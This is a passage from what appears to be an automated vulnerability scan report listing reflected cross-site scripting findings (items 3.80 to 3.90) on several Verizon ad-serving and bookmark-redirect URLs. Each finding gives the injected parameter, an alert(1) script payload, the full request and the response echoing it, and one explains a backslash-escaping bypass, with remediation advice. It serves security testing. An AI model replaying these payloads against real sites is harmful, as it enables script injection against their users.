Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.80. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a690"><script>alert(1)</script>2618c9bf78 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search=" target="_top">
...[SNIP]...

3.81. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f4c"><script>alert(1)</script>718101defe9 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
opservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.82. http://syndicate.verizon.net/ads/js.ashx [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63c88\'%3balert(1)//ae87b284984 was submitted in the page parameter. This input was echoed as 63c88\\';alert(1)//ae87b284984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage63c88\'%3balert(1)//ae87b284984&pos=Right,Right1 HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:45 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage63c88\\';alert(1)//ae87b284984';
OAS_listpos = 'Right,Right1';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&
...[SNIP]...

3.83. http://syndicate.verizon.net/ads/js.ashx [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e25b\'%3balert(1)//34bbd0c359d was submitted in the pos parameter. This input was echoed as 2e25b\\';alert(1)//34bbd0c359d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right12e25b\'%3balert(1)//34bbd0c359d HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:46 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage';
OAS_listpos = 'Right,Right12e25b\\';alert(1)//34bbd0c359d';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vi
...[SNIP]...

3.84. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c748"%3balert(1)//a814480360d was submitted in the WT.ti parameter. This input was echoed as 9c748";alert(1)//a814480360d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout9c748"%3balert(1)//a814480360d HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=T2NHMnySvcZpqX6wZM4gwP0QdlsfW8NSqTwB5vsX8vvGTd9mcWpV!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout9c748";alert(1)//a814480360d";
</script>

3.85. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80cd"%3balert(1)//130ab0744e1 was submitted in the channel parameter. This input was echoed as e80cd";alert(1)//130ab0744e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd"%3balert(1)//130ab0744e1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=2yWNMntR2VP6ScZhsjs316DnrdJyKR4tNT4KFC3Tlgw3M6qTrYxC!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd";alert(1)//130ab0744e1";
</script>

3.86. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee502"%3balert(1)//be7a3cddcbe was submitted in the clientid parameter. This input was echoed as ee502";alert(1)//be7a3cddcbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmree502"%3balert(1)//be7a3cddcbe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=49hPMnthQRfmJYvnpJ7YLhQRMxK64N2vwmLvCfHFQqf4VKnbKGQy!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmree502";alert(1)//be7a3cddcbe&channel=Nwcnsmr";
</script>

3.87. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f54c1"%3balert(1)//67e8173d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f54c1";alert(1)//67e8173d08d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&f54c1"%3balert(1)//67e8173d08d=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=6WMRMnpLcT21tTHQ614mJtX0tcZp14FT8s1Ly11BB1kNqpGpDK6m!-552517484; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&f54c1";alert(1)//67e8173d08d=1";
</script>

3.88. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b66"%3balert(1)//b6c880b93f7 was submitted in the q parameter. This input was echoed as f8b66";alert(1)//b6c880b93f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='f8b66"%3balert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=QkFsMntNGTxpwFvTMLpddppD4hwQGbGJ0JMQcgH9Hm6mpLK12BHl!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='f8b66";alert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.89. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b1d"%3balert(1)//54879207f6a was submitted in the web_search_type parameter. This input was echoed as d8b1d";alert(1)//54879207f6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basicd8b1d"%3balert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:08 GMT
Connection: close
Set-Cookie: VZCSESSIONID=3Z6JMntGTjQnpj89SqNJNCqKqk8Q965Xg3t45VjvdyLRx1npqRNk!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basicd8b1d";alert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.90. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26041"%3balert(1)//db67067f088 was submitted in the WT.ti parameter. This input was echoed as 26041";alert(1)//db67067f088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

